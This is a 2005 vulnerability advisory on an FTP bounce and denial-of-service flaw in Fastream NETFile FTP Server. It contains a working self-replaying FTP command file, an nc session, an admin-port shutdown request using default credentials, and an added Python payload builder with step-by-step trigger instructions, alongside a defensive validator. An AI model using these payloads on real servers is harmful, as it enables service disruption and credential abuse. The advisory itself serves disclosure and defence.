SIG^2 Vulnerability Research Advisory

Fastream NETFile FTP/Web Server DoS Vulnerability

by Tan Chew Keong
Release Date: 17 May 2005

Summary

Fastream NETFile FTP/Web Server combines an FTP server and a web server in a single program. The vendor describes it as the "easiest to setup and administer server" on the Internet.

The default installation of NETFile FTP does not validate the IP address supplied in a PORT command. This can be exploited to mount an FTP bounce attack from the server, and a user with upload privilege can exploit it to cause a Denial-of-Service (DoS) on the server.

 
Tested System

Fastream NETFile FTP/Web Server Version 7.4.6 on English Win2K SP4.

 
Details

The default installation of NETFile FTP Server accepts a PORT command with an arbitrary IP address, including the server's own address and 127.0.0.1. Because the address of the data connection need not match the address of the logged-on user, the server can be used as a relay in an FTP bounce attack. The vendor clarified that this behaviour is a feature required to support FXP (server-to-server transfers). We recommend that it be disabled in the default installation and enabled only by administrators who need FXP and are fully aware of the risks.

More importantly, the server also accepts PORT commands that name its own IP address or the loopback address (127.0.0.1). A user with upload privilege can exploit this to cause a DoS on the FTP server.
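The validation the advisory asks for, as an added example that is neither NETFile's code nor part of the original advisory: a server-side check of the PORT argument that implements the recommended default (no FXP, so the data address must equal the control-connection peer) and additionally refuses loopback, the server's own addresses and privileged ports, a common bounce mitigation in other FTP servers. The client address, the server address set and the 1024 cut-off are constructed assumptions for the example.

```python
"""Parse and police FTP PORT arguments (added example, not vendor code).

RFC 959 PORT arguments are h1,h2,h3,h4,p1,p2; the data port is p1*256+p2.
"""
import ipaddress


def parse_port_args(arg):
    """Return (ip, port) from a PORT argument string, or raise ValueError."""
    parts = arg.strip().split(",")
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated fields")
    nums = [int(p) for p in parts]          # non-numeric fields raise ValueError
    if any(n < 0 or n > 255 for n in nums):
        raise ValueError("each PORT field must be 0..255")
    ip = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    return ip, port


def port_args(ip, port):
    """Inverse of parse_port_args: encode ip:port as a PORT argument."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range")
    return f"{ip.replace('.', ',')},{port // 256},{port % 256}"


def check_port_command(arg, client_ip, server_ips, allow_fxp=False):
    """Decide whether a PORT command may be honoured.

    client_ip  : address of the control connection peer (assumed known)
    server_ips : every address the server itself listens on (assumed set)
    allow_fxp  : False is the default the advisory recommends
    Returns (ok, reason).
    """
    try:
        ip, port = parse_port_args(arg)
    except ValueError as exc:
        return False, f"malformed PORT: {exc}"
    addr = ipaddress.ip_address(ip)
    # 127.0.0.1 (or any loopback) is what the advisory's DoS relies on.
    if addr.is_loopback or addr.is_unspecified or addr.is_multicast:
        return False, "data address is loopback/unspecified/multicast"
    if ip in server_ips:
        return False, "data address is the server itself"
    # Privileged target ports (21, 25, ...) are the classic bounce targets;
    # the 1024 threshold is this example's hardening choice, not the vendor's.
    if port < 1024:
        return False, "data port is privileged"
    if not allow_fxp and ip != client_ip:
        return False, "data address differs from control peer (FXP disabled)"
    return True, f"data connection to {ip}:{port} permitted"


if __name__ == "__main__":
    # Constructed scenario: server 192.168.2.102 (as in the advisory), client 192.168.2.50.
    server = {"192.168.2.102"}
    for cmd in ("127,0,0,1,0,21",            # the advisory's DoS PORT
                "192,168,2,102,117,48",      # server's own admin port 30000
                "192,168,2,50,19,137"):      # client's own address, port 5001
        print(cmd, "->", check_port_command(cmd, "192.168.2.50", server))
```

Even with `allow_fxp=True` the loopback, own-address and privileged-port rules still reject the advisory's payloads, which is the gap the vendor's "trusted users only" answer leaves open.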

A malicious user can cause a DoS on the FTP server by uploading a text file named "a.txt" that contains the following commands. Note that there must be a line terminator (CR) after the last line as well.

USER anonymous
PASS a
PORT 127,0,0,1,0,21
RETR a.txt

Then connect to the control port and issue the following commands. The RETR makes the server deliver a.txt to its own port 21, where the contents are parsed as a fresh session that logs in and repeats the same PORT and RETR, so the server keeps feeding itself.

c:\> nc 192.168.2.102 21
220 Fastream NETFile FTP Server
USER anonymous
331 Password required for anonymous.
PASS a
230 User anonymous has successfully logged in.
PORT 127,0,0,1,0,21
200 Port command successful.
RETR a.txt
150 Opening data connection for a.txt.
226 File sent ok


NETFile FTP Server also has an admin interface that listens on 127.0.0.1:30000. If the default admin credentials (username Root, password root) have not been changed, the same weakness can be used to deliver admin commands to that port, bypassing both the localhost-only binding and any firewall rule that blocks port 30000. For example, a malicious user can upload the following file and have the server send it to port 30000 by means of a PORT command. This shuts down the FTP server if the default admin password is still in place.

POST / HTTP/1.1
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Fastream NETFile Server
Host: 127.0.0.1:30000
Content-Length: 232
Cache-Control: no-cache

<?xml version="1.0"?>
<message><type>request</type><adminlogindata><username>Root</username>
<password>root</password></adminlogindata><requestType>STOP_FTP_SERVER</requestType>
<data><serverName>Default</serverName></data></message>
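Building the two payload files above with the framing the bounce depends on, as an added example that is not part of the advisory: the server replays an uploaded file byte for byte to whatever address the PORT command named, so the file must already be a complete protocol message, CRLF-terminated FTP commands for port 21 and a full HTTP request with an accurate Content-Length for the admin port. The PORT argument for port 30000 is derived here as 127,0,0,1,117,48 (30000 = 117*256 + 48); the advisory does not spell it out. Credentials, request type and server name are copied from the advisory's request.

```python
"""Construct the bounce payloads described in the advisory (added example)."""


def ftp_command_script(commands):
    """FTP command file: every line, including the last, ends in CRLF."""
    return "".join(c + "\r\n" for c in commands).encode("ascii")


def admin_request(username, password, request_type, server_name,
                  host="127.0.0.1", port=30000):
    """HTTP POST for the NETFile admin port, Content-Length computed from the body."""
    body = (
        '<?xml version="1.0"?>'
        f"<message><type>request</type><adminlogindata><username>{username}</username>"
        f"<password>{password}</password></adminlogindata>"
        f"<requestType>{request_type}</requestType>"
        f"<data><serverName>{server_name}</serverName></data></message>"
    ).encode("utf-8")
    headers = [
        "POST / HTTP/1.1",
        "Accept: text/html, */*",
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: Fastream NETFile Server",
        f"Host: {host}:{port}",
        f"Content-Length: {len(body)}",   # computed, never hand-counted
        "Cache-Control: no-cache",
    ]
    return "\r\n".join(headers).encode("ascii") + b"\r\n\r\n" + body


def port_argument(ip, port):
    """PORT argument (h1,h2,h3,h4,p1,p2) that points the data connection at ip:port."""
    return f"{ip.replace('.', ',')},{port // 256},{port % 256}"


def content_length_matches(request):
    """Sanity check before uploading: a wrong Content-Length leaves the admin
    listener waiting for more bytes instead of acting on the request."""
    head, _, body = request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1]) == len(body)
    return False


if __name__ == "__main__":
    script = ftp_command_script(
        ["USER anonymous", "PASS a", "PORT 127,0,0,1,0,21", "RETR a.txt"])
    req = admin_request("Root", "root", "STOP_FTP_SERVER", "Default")
    print(script.decode(), end="")
    print(req.decode())
    print("PORT", port_argument("127.0.0.1", 30000))
```

Upload the output of `admin_request` as a file, then issue `PORT 127,0,0,1,117,48` followed by `RETR` of that file, exactly as in the port 21 session shown earlier.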

 
Patch

  1. Upgrade to Version 7.6, which allows FXP to be disabled if it is not required.
  2. Note that if FXP is enabled, the DoS attack described above remains possible (PORT 127,0,0,1,x,y is still accepted). If you enable FXP, allow only trusted users to log on to the FTP server.
  3. Set a strong password for the admin interface.

 
Disclosure Timeline

17 Apr 05 - Vulnerability Discovered.
21 Apr 05 - Initial Vendor Notification.
21 Apr 05 - Received reply that this is a feature required to support FXP.
21 Apr 05 - Provided Vendor with DoS Exploitation Scenario.
15 May 05 - Vendor Released Version 7.6 that allows disabling of FXP.
15 May 05 - Informed Vendor about DoS Issue.
15 May 05 - Vendor replied that if FXP is enabled, then all users are assumed to be trusted.
17 May 05 - Public Release.

 
Contacts

For further questions and enquiries, email the following.

Overall-in-charge: Tan Chew Keong


Updated: 17/05/2005
webmaster@security.org.sg